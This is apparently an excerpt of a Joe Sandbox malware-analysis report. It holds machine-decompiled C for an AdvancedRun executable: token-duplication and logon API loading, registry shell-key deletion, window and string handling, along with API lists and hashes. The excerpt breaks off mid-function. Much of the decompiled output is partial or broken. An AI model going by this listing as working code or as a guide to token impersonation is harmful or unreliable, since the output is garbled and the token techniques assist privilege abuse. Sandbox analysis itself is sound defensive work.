                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                  • API String ID: 2238633743-1970996977
                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 39%
                                                                  			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                  				void* _v8;
                                                                  				void _v2054;
                                                                  				short _v2056;
                                                                  				void _v4102;
                                                                  				short _v4104;
                                                                  				signed int _t28;
                                                                  				void* _t34;
                                                                  
                                                                  				E0040B550(0x1004, __ecx);
                                                                  				_t36 = 0;
                                                                  				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                  					_v2056 = 0;
                                                                  					memset( &_v2054, 0, 0x7fe);
                                                                  					_v4104 = 0;
                                                                  					memset( &_v4102, 0, 0x7fe);
                                                                  					_t34 = __ebx + 0x20a;
                                                                  					_push(_t34);
                                                                  					_push(__ebx);
                                                                  					_push(L"%s\\shell\\%s\\command");
                                                                  					_push(0x3ff);
                                                                  					_push( &_v2056);
                                                                  					L0040B1EC();
                                                                  					_push(_t34);
                                                                  					_push(__ebx);
                                                                  					_push(L"%s\\shell\\%s");
                                                                  					_push(0x3ff);
                                                                  					_push( &_v4104);
                                                                  					L0040B1EC();
                                                                  					RegDeleteKeyW(_v8,  &_v2056);
                                                                  					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                  					asm("sbb esi, esi");
                                                                  					_t36 =  ~_t28 + 1;
                                                                  					RegCloseKey(_v8);
                                                                  				}
                                                                  				return _t36;
                                                                  			}
                                                                  0x004045c2
                                                                  0x004045d1
                                                                  0x004045da
                                                                  0x004045ef
                                                                  0x004045f6
                                                                  0x00404604
                                                                  0x0040460b
                                                                  0x00404610
                                                                  0x00404616
                                                                  0x00404617
                                                                  0x00404618
                                                                  0x00404628
                                                                  0x00404629
                                                                  0x0040462a
                                                                  0x0040462f
                                                                  0x00404630
                                                                  0x00404631
                                                                  0x0040463c
                                                                  0x0040463d
                                                                  0x0040463e
                                                                  0x00404656
                                                                  0x00404662
                                                                  0x0040466b
                                                                  0x0040466d
                                                                  0x0040466e
                                                                  0x00404674
                                                                  0x00404679

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Delete_snwprintfmemset$Close
                                                                  • String ID: %s\shell\%s$%s\shell\%s\command
                                                                  • API String ID: 1018939227-3575174989
                                                                  • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                  • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                  • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			E0040313D(void* __ecx) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				struct HWND__* _t6;
                                                                  				_Unknown_base(*)()* _t11;
                                                                  				struct HWND__* _t15;
                                                                  				void* _t20;
                                                                  				struct HINSTANCE__* _t23;
                                                                  
                                                                  				_v12 = 8;
                                                                  				_v8 = 0xff;
                                                                  				_t15 = 0;
                                                                  				_t20 = 0;
                                                                  				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                  				if(_t23 == 0) {
                                                                  					L5:
                                                                  					__imp__#17();
                                                                  					_t6 = 1;
                                                                  					L6:
                                                                  					if(_t6 != 0) {
                                                                  						return 1;
                                                                  					} else {
                                                                  						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                  						return 0;
                                                                  					}
                                                                  				}
                                                                  				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                  				if(_t11 != 0) {
                                                                  					_t20 = 1;
                                                                  					_t15 =  *_t11( &_v12);
                                                                  				}
                                                                  				FreeLibrary(_t23);
                                                                  				if(_t20 == 0) {
                                                                  					goto L5;
                                                                  				} else {
                                                                  					_t6 = _t15;
                                                                  					goto L6;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                  • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                  • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                  • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                  • API String ID: 2780580303-317687271
                                                                  • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                  • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                  • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                  				struct HWND__* _v8;
                                                                  				struct HWND__* _v12;
                                                                  				struct tagRECT _v28;
                                                                  				struct tagRECT _v44;
                                                                  				int _t50;
                                                                  				long _t61;
                                                                  				struct HDC__* _t63;
                                                                  				intOrPtr _t65;
                                                                  				intOrPtr _t68;
                                                                  				struct HWND__* _t71;
                                                                  				intOrPtr _t72;
                                                                  				void* _t73;
                                                                  				int _t74;
                                                                  				int _t80;
                                                                  				int _t83;
                                                                  
                                                                  				_t73 = __edx;
                                                                  				_v8 = 0;
                                                                  				_v12 = 0;
                                                                  				_t74 = GetSystemMetrics(0x11);
                                                                  				_t80 = GetSystemMetrics(0x10);
                                                                  				if(_t74 == 0 || _t80 == 0) {
                                                                  					_t63 = GetDC(0);
                                                                  					_t80 = GetDeviceCaps(_t63, 8);
                                                                  					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                  					ReleaseDC(0, _t63);
                                                                  				}
                                                                  				GetWindowRect(_a4,  &_v44);
                                                                  				if((_a8 & 0x00000004) != 0) {
                                                                  					_t71 = GetParent(_a4);
                                                                  					if(_t71 != 0) {
                                                                  						_v28.left = _v28.left & 0x00000000;
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						asm("stosd");
                                                                  						GetWindowRect(_t71,  &_v28);
                                                                  						_t61 = _v28.left;
                                                                  						_t72 = _v28.top;
                                                                  						_t80 = _v28.right - _t61 + 1;
                                                                  						_t74 = _v28.bottom - _t72 + 1;
                                                                  						_v8 = _t61;
                                                                  						_v12 = _t72;
                                                                  					}
                                                                  				}
                                                                  				_t65 = _v44.right;
                                                                  				if((_a8 & 0x00000001) == 0) {
                                                                  					asm("cdq");
                                                                  					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                  				} else {
                                                                  					_t83 = 0;
                                                                  				}
                                                                  				_t68 = _v44.bottom;
                                                                  				if((_a8 & 0x00000002) != 0) {
                                                                  					L11:
                                                                  					_t50 = 0;
                                                                  					goto L12;
                                                                  				} else {
                                                                  					asm("cdq");
                                                                  					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                  					if(_t50 >= 0) {
                                                                  						L12:
                                                                  						if(_t83 < 0) {
                                                                  							_t83 = 0;
                                                                  						}
                                                                  						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                  					}
                                                                  					goto L11;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                  • GetSystemMetrics.USER32 ref: 00404DC2
                                                                  • GetSystemMetrics.USER32 ref: 00404DC8
                                                                  • GetDC.USER32(00000000), ref: 00404DD5
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                  • ReleaseDC.USER32 ref: 00404DF4
                                                                  • GetWindowRect.USER32 ref: 00404E07
                                                                  • GetParent.USER32(?), ref: 00404E12
                                                                  • GetWindowRect.USER32 ref: 00404E2F
                                                                  • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                  • String ID:
                                                                  • API String ID: 2163313125-0
                                                                  • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                  • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                  • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 88%
                                                                  			E00406398(void* __eflags, wchar_t* _a4) {
                                                                  				void* __esi;
                                                                  				void* _t3;
                                                                  				int _t6;
                                                                  
                                                                  				_t3 = E00404AAA(_a4);
                                                                  				if(_t3 != 0) {
                                                                  					wcscpy(0x40fb90, _a4);
                                                                  					wcscpy(0x40fda0, L"general");
                                                                  					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                  					asm("sbb eax, eax");
                                                                  					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                  					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                  					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                  					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                  				}
                                                                  				return _t3;
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                  • wcscpy.MSVCRT ref: 004063B2
                                                                  • wcscpy.MSVCRT ref: 004063C2
                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                    • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32(0040FDA0,?,0040C4E8,0040FE30,?,0040FB90), ref: 00405F30
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                  • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                  • API String ID: 3176057301-2039793938
                                                                  • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                  • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                  • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 16%
                                                                  			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                  				void* _t2;
                                                                  				signed short* _t3;
                                                                  				void* _t7;
          				void* _t8;
          				void* _t10;

0x0040adf6				_t3 = __eax;
0x0040adf8				_t8 = __ecx;
0x0040adfa				_t7 = 8;
0x0040adfb				while(1) {
0x0040adfb					_t2 =  *_t3 & 0x0000ffff;
0x0040ae02					if(_t2 != 0x3c) {
0x00000000						goto L3;
0x00000000					}
0x0040ae04					_push(_t7);
0x0040ae05					_push(L"&lt;");
0x0040ae6d					L14:
0x0040ae6e					_t2 = memcpy(_t8, ??, ??);
0x0040ae73					_t10 = _t10 + 0xc;
0x0040ae76					_t8 = _t8 + _t7;
0x0040ae7f					L16:
0x0040ae83					if( *_t3 != 0) {
0x0040ae86						_t3 =  &(_t3[1]);
0x00000000						continue;
0x0040ae86					}
0x0040ae8f					return _t2;
0x0040ae0c					L3:
0x0040ae10					if(_t2 != 0x3e) {
0x0040ae1e						if(_t2 != 0x22) {
0x0040ae3b							if((_t2 & 0x0000ffff) != 0xffffffb0) {
0x0040ae4a								if(_t2 != 0x26) {
0x0040ae65									if(_t2 != 0xa) {
0x0040ae7a										 *_t8 = _t2;
0x0040ae7e										_t8 = _t8 + 2;
0x0040ae67									} else {
0x0040ae67										_push(_t7);
0x0040ae68										_push(L"<br>");
0x00000000										goto L14;
0x0040ae68									}
0x0040ae4c								} else {
0x0040ae4c									_push(0xa);
0x0040ae4e									_push(L"&amp;");
0x00000000									goto L11;
0x0040ae4e								}
0x0040ae3d							} else {
0x0040ae3d								_push(0xa);
0x0040ae3f								_push(L"&deg;");
0x0040ae53								L11:
0x0040ae54								_t2 = memcpy(_t8, ??, ??);
0x0040ae59								_t10 = _t10 + 0xc;
0x0040ae5c								_t8 = _t8 + 0xa;
0x0040ae5c							}
0x0040ae20						} else {
0x0040ae28							_t2 = memcpy(_t8, L"&quot;", 0xc);
0x0040ae2d							_t10 = _t10 + 0xc;
0x0040ae30							_t8 = _t8 + 0xc;
0x0040ae30						}
0x0040ae12					} else {
0x0040ae12						_push(_t7);
0x0040ae13						_push(L"&gt;");
0x00000000						goto L14;
0x0040ae13					}
0x00000000					goto L16;
0x0040ae10				}
          			}

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                  • API String ID: 3510742995-3273207271
                                                                  • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                  • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                  • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
          			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
          				struct HDWP__* _v8;
          				intOrPtr* _v12;
          				void _v534;
          				short _v536;
          				void* __ebx;
          				void* __edi;
          				intOrPtr _t42;
          				intOrPtr* _t95;
          				RECT* _t96;

0x004041f9				_t95 = __ecx;
0x00404205				_v12 = __ecx;
0x00404208				if(_a4 == 0x233) {
0x00404217					_v536 = 0;
0x0040421e					memset( &_v534, 0, 0x208);
0x00404236					DragQueryFileW(_a8, 0,  &_v536, 0x104);
0x0040423f					DragFinish(_a8);
0x0040424a					 *((intOrPtr*)( *_t95 + 4))(0);
0x0040425f					E00404923(0x104, _t95 + 0x1680,  &_v536);
0x0040426b					 *((intOrPtr*)( *_v12 + 4))(1);
0x0040426e					_t95 = _v12;
0x0040426e				}
0x00404275				if(_a4 != 5) {
0x004043be					if(_a4 != 0xf) {
0x004043ce						if(_a4 == 0x24) {
0x004043d0							_t42 = _a12;
0x004043d3							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
0x004043da							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
0x004043da						}
0x004043c0					} else {
0x004043c3						E00402EC8(_t95 + 0x40);
0x004043c3					}
0x0040427b				} else {
0x0040428c					_v8 = BeginDeferWindowPos(0xd);
0x0040428f					_t96 = _t95 + 0x40;
0x00404295					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
0x004042a5					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
0x004042b8					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
0x004042cb					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
0x004042de					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
0x004042f1					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
0x00404304					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
0x00404317					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
0x0040432a					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
0x0040433d					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
0x00404350					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
0x00404363					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
0x00404376					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
0x00404389					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
0x0040439c					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
0x004043a4					EndDeferWindowPos(_v8);
0x004043af					InvalidateRect( *(_t96 + 0x10), _t96, 1);
0x004043b5					_t95 = _v12;
0x004043b5				}
0x004043f5				return E00402CED(_t95, _a4, _a8, _a12);
          			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040421E
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • BeginDeferWindowPos.USER32(0000000D), ref: 0040427D
                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                  • String ID: $
                                                                  • API String ID: 2142561256-3993045852
                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 55%
                                                                  			E00405B81(signed short __ebx) {
                                                                  				signed int _t21;
                                                                  				void* _t22;
                                                                  				struct HINSTANCE__* _t25;
                                                                  				signed int _t27;
                                                                  				void* _t35;
                                                                  				signed short _t39;
                                                                  				signed int _t40;
                                                                  				void* _t57;
                                                                  				int _t61;
                                                                  				void* _t62;
                                                                  				int _t71;
                                                                  
                                                                  				_t39 = __ebx;
                                                                  				if( *0x41c470 == 0) {
                                                                  					E00405ADF();
                                                                  				}
                                                                  				_t40 =  *0x41c468;
                                                                  				_t21 = 0;
                                                                  				if(_t40 <= 0) {
                                                                  					L5:
                                                                  					_t57 = 0;
                                                                  				} else {
                                                                  					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                  						_t21 = _t21 + 1;
                                                                  						if(_t21 < _t40) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L5;
                                                                  						}
                                                                  						goto L6;
                                                                  					}
                                                                  					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                  				}
                                                                  				L6:
                                                                  				if(_t57 != 0) {
                                                                  					L21:
                                                                  					_t22 = _t57;
                                                                  				} else {
                                                                  					if((_t39 & 0x00010000) == 0) {
                                                                  						if( *0x40fb90 == 0) {
                                                                  							_push( *0x41c478 - 1);
                                                                  							_push( *0x41c45c);
                                                                  							_push(_t39);
                                                                  							_t25 = E00405CE7();
                                                                  							goto L15;
                                                                  						} else {
                                                                  							wcscpy(0x40fda0, L"strings");
                                                                  							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                  							_t62 = _t62 + 0x10;
                                                                  							if(_t35 == 0) {
                                                                  								L13:
                                                                  								_t25 = GetModuleHandleW(0);
                                                                  								_push( *0x41c478 - 1);
                                                                  								_push( *0x41c45c);
                                                                  								_push(_t39);
                                                                  								goto L15;
                                                                  							} else {
                                                                  								_t61 = wcslen( *0x41c45c);
                                                                  								if(_t61 == 0) {
                                                                  									goto L13;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						_t25 = GetModuleHandleW(_t57);
                                                                  						_push( *0x41c478 - 1);
                                                                  						_push( *0x41c45c);
                                                                  						_push(_t39 & 0x0000ffff);
                                                                  						L15:
                                                                  						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                  						_t71 = _t61;
                                                                  					}
                                                                  					if(_t71 <= 0) {
                                                                  						L20:
                                                                  						_t22 = 0x40c4e8;
                                                                  					} else {
                                                                  						_t27 =  *0x41c46c;
                                                                  						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                  							goto L20;
                                                                  						} else {
                                                                  							_t57 =  *0x41c458 + _t27 * 2;
                                                                  							_t14 = _t61 + 2; // 0x2
                                                                  							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                  							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                  							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                  							 *0x41c468 =  *0x41c468 + 1;
                                                                  							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                  							if(_t57 != 0) {
                                                                  								goto L21;
                                                                  							} else {
                                                                  								goto L20;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t22;
                                                                  			}

Instruction addresses for the listing above: 0x00405b81 to 0x00405ce6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                  • String ID: strings
                                                                  • API String ID: 3166385802-3030018805
                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                  				char _v8;
                                                                  				void* _v12;
